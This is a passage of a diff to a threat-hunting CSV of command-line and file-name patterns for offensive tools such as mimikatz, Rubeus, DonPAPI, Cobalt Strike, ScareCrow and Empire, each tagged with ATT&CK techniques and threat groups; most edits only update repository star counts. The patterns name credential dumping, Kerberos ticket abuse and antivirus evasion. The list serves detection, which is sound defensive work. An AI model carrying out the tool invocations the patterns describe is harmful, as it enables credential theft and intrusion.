T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* run donpapi*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "* RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - 
TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"* -runaslsass*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"* -runaslsass*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "* rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rustbof *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "* rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" 
@@ -1660,29 +1660,29 @@ "* -s * -c enable_winrm *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c remote_posh *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * --method 1 --function shell_exec --parameters cmd:id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -s *ascii* -b *reverse*invoke-expression*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -s *ascii* -b *reverse*invoke-expression*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -s 
putty.exe_sig *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*' s::l '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"* s4u * /bronzebit*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u * /nopac*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u */rc4:* ","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*' s::l '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* s4u * /bronzebit*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u * /nopac*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u */rc4:* ","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -sam * -system * -security * LOCAL > *.out*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -SauronEye -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -save-old -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -SauronEye -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -save-old -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -sc GetSyscallStub 
*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* -sc SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* scan * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* scan * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* scan --github-org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "* scan --github-user*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive 
information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" -"* --scan-local-shares * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","437","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" -"* -ScheduledTask -OnIdle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --scan-local-shares * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"* -ScheduledTask -OnIdle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* --script dns-srv-enum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - 
